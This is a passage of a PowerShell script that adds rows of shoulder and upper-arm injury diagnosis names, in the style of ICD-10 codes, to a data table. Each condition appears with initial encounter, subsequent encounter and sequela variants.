$DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, right arm","Laceration of unspecified blood vessel at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, left arm","Laceration of unspecified blood vessel at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, left arm","Laceration of unspecified blood vessel at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, left arm","Laceration of unspecified blood vessel at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Laceration of unspecified blood vessel at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Laceration of unspecified blood vessel at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Laceration of unspecified blood vessel at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, right arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, right arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, right arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, left arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, left arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, left arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Other specified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Unspecified injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Strain of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Laceration of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder","Other injury of muscle(s) and tendon(s) of the rotator cuff of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, right arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, right arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, right arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, left arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, left arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, left arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of long head of biceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of long head of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, right arm","Strain of muscle, fascia and tendon of long head of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, right arm","Strain of muscle, fascia and tendon of long head of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, right arm","Strain of muscle, fascia and tendon of long head of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, left arm","Strain of muscle, fascia and tendon of long head of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, left arm","Strain of muscle, fascia and tendon of long head of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, left arm","Strain of muscle, fascia and tendon of long head of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, unspecified arm","Strain of muscle, fascia and tendon of long head of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, unspecified arm","Strain of muscle, fascia and tendon of long head of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of long head of biceps, unspecified arm","Strain of muscle, fascia and tendon of long head of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, right arm","Laceration of muscle, fascia and tendon of long head of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, right arm","Laceration of muscle, fascia and tendon of long head of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, right arm","Laceration of muscle, fascia and tendon of long head of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, left arm","Laceration of muscle, fascia and tendon of long head of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, left arm","Laceration of muscle, fascia and tendon of long head of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, left arm","Laceration of muscle, fascia and tendon of long head of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, unspecified arm","Laceration of muscle, fascia and tendon of long head of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, unspecified arm","Laceration of muscle, fascia and tendon of long head of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of long head of biceps, unspecified arm","Laceration of muscle, fascia and tendon of long head of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, right arm","Other injury of muscle, fascia and tendon of long head of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, right arm","Other injury of muscle, fascia and tendon of long head of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, right arm","Other injury of muscle, fascia and tendon of long head of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, left arm","Other injury of muscle, fascia and tendon of long head of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, left arm","Other injury of muscle, fascia and tendon of long head of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, left arm","Other injury of muscle, fascia and tendon of long head of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, unspecified arm","Other injury of muscle, fascia and tendon of long head of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, unspecified arm","Other injury of muscle, fascia and tendon of long head of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of long head of biceps, unspecified arm","Other injury of muscle, fascia and tendon of long head of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, right arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, right arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, right arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, left arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, left arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, left arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of other parts of biceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of other parts of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, right arm","Strain of muscle, fascia and tendon of other parts of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, right arm","Strain of muscle, fascia and tendon of other parts of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, right arm","Strain of muscle, fascia and tendon of other parts of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, left arm","Strain of muscle, fascia and tendon of other parts of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, left arm","Strain of muscle, fascia and tendon of other parts of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, left arm","Strain of muscle, fascia and tendon of other parts of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, unspecified arm","Strain of muscle, fascia and tendon of other parts of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, unspecified arm","Strain of muscle, fascia and tendon of other parts of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of other parts of biceps, unspecified arm","Strain of muscle, fascia and tendon of other parts of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, right arm","Laceration of muscle, fascia and tendon of other parts of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, right arm","Laceration of muscle, fascia and tendon of other parts of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, right arm","Laceration of muscle, fascia and tendon of other parts of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, left arm","Laceration of muscle, fascia and tendon of other parts of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, left arm","Laceration of muscle, fascia and tendon of other parts of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, left arm","Laceration of muscle, fascia and tendon of other parts of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, unspecified arm","Laceration of muscle, fascia and tendon of other parts of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, unspecified arm","Laceration of muscle, fascia and tendon of other parts of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of other parts of biceps, unspecified arm","Laceration of muscle, fascia and tendon of other parts of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, right arm","Other injury of muscle, fascia and tendon of other parts of biceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, right arm","Other injury of muscle, fascia and tendon of other parts of biceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, right arm","Other injury of muscle, fascia and tendon of other parts of biceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, left arm","Other injury of muscle, fascia and tendon of other parts of biceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, left arm","Other injury of muscle, fascia and tendon of other parts of biceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, left arm","Other injury of muscle, fascia and tendon of other parts of biceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, unspecified arm","Other injury of muscle, fascia and tendon of other parts of biceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, unspecified arm","Other injury of muscle, fascia and tendon of other parts of biceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of other parts of biceps, unspecified arm","Other injury of muscle, fascia and tendon of other parts of biceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, right arm","Unspecified injury of muscle, fascia and tendon of triceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, right arm","Unspecified injury of muscle, fascia and tendon of triceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, right arm","Unspecified injury of muscle, fascia and tendon of triceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, left arm","Unspecified injury of muscle, fascia and tendon of triceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, left arm","Unspecified injury of muscle, fascia and tendon of triceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, left arm","Unspecified injury of muscle, fascia and tendon of triceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of triceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of triceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of triceps, unspecified arm","Unspecified injury of muscle, fascia and tendon of triceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, right arm","Strain of muscle, fascia and tendon of triceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, right arm","Strain of muscle, fascia and tendon of triceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, right arm","Strain of muscle, fascia and tendon of triceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, left arm","Strain of muscle, fascia and tendon of triceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, left arm","Strain of muscle, fascia and tendon of triceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, left arm","Strain of muscle, fascia and tendon of triceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, unspecified arm","Strain of muscle, fascia and tendon of triceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, unspecified arm","Strain of muscle, fascia and tendon of triceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of triceps, unspecified arm","Strain of muscle, fascia and tendon of triceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, right arm","Laceration of muscle, fascia and tendon of triceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, right arm","Laceration of muscle, fascia and tendon of triceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, right arm","Laceration of muscle, fascia and tendon of triceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, left arm","Laceration of muscle, fascia and tendon of triceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, left arm","Laceration of muscle, fascia and tendon of triceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, left arm","Laceration of muscle, fascia and tendon of triceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, unspecified arm","Laceration of muscle, fascia and tendon of triceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, unspecified arm","Laceration of muscle, fascia and tendon of triceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of triceps, unspecified arm","Laceration of muscle, fascia and tendon of triceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, right arm","Other injury of muscle, fascia and tendon of triceps, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, right arm","Other injury of muscle, fascia and tendon of triceps, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, right arm","Other injury of muscle, fascia and tendon of triceps, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, left arm","Other injury of muscle, fascia and tendon of triceps, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, left arm","Other injury of muscle, fascia and tendon of triceps, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, left arm","Other injury of muscle, fascia and tendon of triceps, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, unspecified arm","Other injury of muscle, fascia and tendon of triceps, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, unspecified arm","Other injury of muscle, fascia and tendon of triceps, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of triceps, unspecified arm","Other injury of muscle, fascia and tendon of triceps, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Unspecified injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, right arm, subsequent encounter") + $null = 